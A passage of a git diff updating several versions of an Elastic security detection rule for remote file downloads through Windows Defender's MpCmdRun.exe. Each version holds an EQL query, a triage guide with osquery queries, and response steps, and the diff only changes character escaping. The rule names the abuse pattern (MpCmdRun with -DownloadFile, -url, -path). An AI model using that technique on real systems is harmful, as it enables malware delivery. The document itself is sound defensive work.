Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Remote File Download via MpCmdRun\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command and control channel. However, they can also abuse signed utilities to drop these files.\n\nThe `MpCmdRun.exe` is a command-line tool part of Windows Defender and is used to manage various Microsoft Windows Defender Antivirus settings and perform certain tasks. 
It can also be abused by attackers to download remote files, including malware and offensive tooling. This rule looks for the patterns used to perform downloads using the utility.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check the reputation of the domain or IP address used to host the downloaded file.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search 
for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).",
 "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"MpCmdRun.exe\" or process.pe.original_file_name == \"MpCmdRun.exe\") and\n process.args : \"-DownloadFile\" and process.args : \"-url\" and process.args : \"-path\"\n",
 "references": [
 "https://twitter.com/mohammadaskar2/status/1301263551638761477",
@@ -59,7 +59,7 @@
 ],
 "risk_score": 47,
 "rule_id": "c6453e73-90eb-4fe7-a98c-cde7bbfc504a",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -72,7 +72,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0011",
 "name": "Command and Control",
diff --git a/packages/security_detection_engine/kibana/security_rule/c6453e73-90eb-4fe7-a98c-cde7bbfc504a_105.json b/packages/security_detection_engine/kibana/security_rule/c6453e73-90eb-4fe7-a98c-cde7bbfc504a_105.json
index f495e19b3bc..2483b611143 100644
--- a/packages/security_detection_engine/kibana/security_rule/c6453e73-90eb-4fe7-a98c-cde7bbfc504a_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/c6453e73-90eb-4fe7-a98c-cde7bbfc504a_105.json
@@ -14,7 +14,7 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Remote File Download via MpCmdRun",
- "note": "## Triage and analysis\n\n### Investigating Remote File Download via MpCmdRun\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command and control channel. However, they can also abuse signed utilities to drop these files.\n\nThe `MpCmdRun.exe` is a command-line tool part of Windows Defender and is used to manage various Microsoft Windows Defender Antivirus settings and perform certain tasks. It can also be abused by attackers to download remote files, including malware and offensive tooling. This rule looks for the patterns used to perform downloads using the utility.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check the reputation of the domain or IP address used to host the downloaded file.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal 
Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Remote File Download via MpCmdRun\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command and control channel. However, they can also abuse signed utilities to drop these files.\n\nThe `MpCmdRun.exe` is a command-line tool part of Windows Defender and is used to manage various Microsoft Windows Defender Antivirus settings and perform certain tasks. It can also be abused by attackers to download remote files, including malware and offensive tooling. This rule looks for the patterns used to perform downloads using the utility.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check the reputation of the domain or IP address used to host the downloaded file.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal 
Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).",
 "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"MpCmdRun.exe\" or process.pe.original_file_name == \"MpCmdRun.exe\") and\n process.args : \"-DownloadFile\" and process.args : \"-url\" and process.args : \"-path\"\n",
 "references": [
 "https://twitter.com/mohammadaskar2/status/1301263551638761477",
@@ -59,7 +59,7 @@
 ],
 "risk_score": 47,
 "rule_id": "c6453e73-90eb-4fe7-a98c-cde7bbfc504a",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -72,7 +72,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0011",
 "name": "Command and Control",
diff --git a/packages/security_detection_engine/kibana/security_rule/c6453e73-90eb-4fe7-a98c-cde7bbfc504a_106.json b/packages/security_detection_engine/kibana/security_rule/c6453e73-90eb-4fe7-a98c-cde7bbfc504a_106.json
index 71679804a8c..6cfddaabc49 100644
--- a/packages/security_detection_engine/kibana/security_rule/c6453e73-90eb-4fe7-a98c-cde7bbfc504a_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/c6453e73-90eb-4fe7-a98c-cde7bbfc504a_106.json
@@ -14,7 +14,7 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Remote File Download via MpCmdRun",
- "note": "## Triage and analysis\n\n### Investigating Remote File Download via MpCmdRun\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command and control channel. However, they can also abuse signed utilities to drop these files.\n\nThe `MpCmdRun.exe` is a command-line tool part of Windows Defender and is used to manage various Microsoft Windows Defender Antivirus settings and perform certain tasks. It can also be abused by attackers to download remote files, including malware and offensive tooling. This rule looks for the patterns used to perform downloads using the utility.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check the reputation of the domain or IP address used to host the downloaded file.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal 
Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Remote File Download via MpCmdRun\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command and control channel. However, they can also abuse signed utilities to drop these files.\n\nThe `MpCmdRun.exe` is a command-line tool part of Windows Defender and is used to manage various Microsoft Windows Defender Antivirus settings and perform certain tasks. It can also be abused by attackers to download remote files, including malware and offensive tooling. This rule looks for the patterns used to perform downloads using the utility.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check the reputation of the domain or IP address used to host the downloaded file.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal 
Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).",
 "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"MpCmdRun.exe\" or process.pe.original_file_name == \"MpCmdRun.exe\") and\n process.args : \"-DownloadFile\" and process.args : \"-url\" and process.args : \"-path\"\n",
 "references": [
 "https://twitter.com/mohammadaskar2/status/1301263551638761477",
@@ -59,7 +59,7 @@
 ],
 "risk_score": 47,
 "rule_id": "c6453e73-90eb-4fe7-a98c-cde7bbfc504a",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -71,7 +71,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0011",
 "name": "Command and Control",
diff --git a/packages/security_detection_engine/kibana/security_rule/c6453e73-90eb-4fe7-a98c-cde7bbfc504a_107.json b/packages/security_detection_engine/kibana/security_rule/c6453e73-90eb-4fe7-a98c-cde7bbfc504a_107.json
index bbccab88cb0..ff949705877 100644
--- a/packages/security_detection_engine/kibana/security_rule/c6453e73-90eb-4fe7-a98c-cde7bbfc504a_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/c6453e73-90eb-4fe7-a98c-cde7bbfc504a_107.json
@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Remote File Download via MpCmdRun", - "note": "## Triage and analysis\n\n### Investigating Remote File Download via MpCmdRun\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command and control channel. However, they can also abuse signed utilities to drop these files.\n\nThe `MpCmdRun.exe` is a command-line tool part of Windows Defender and is used to manage various Microsoft Windows Defender Antivirus settings and perform certain tasks. It can also be abused by attackers to download remote files, including malware and offensive tooling. This rule looks for the patterns used to perform downloads using the utility.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check the reputation of the domain or IP address used to host the downloaded file.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal 
Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Remote File Download via MpCmdRun\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command and control channel. However, they can also abuse signed utilities to drop these files.\n\nThe `MpCmdRun.exe` is a command-line tool part of Windows Defender and is used to manage various Microsoft Windows Defender Antivirus settings and perform certain tasks. It can also be abused by attackers to download remote files, including malware and offensive tooling. This rule looks for the patterns used to perform downloads using the utility.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check the reputation of the domain or IP address used to host the downloaded file.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal 
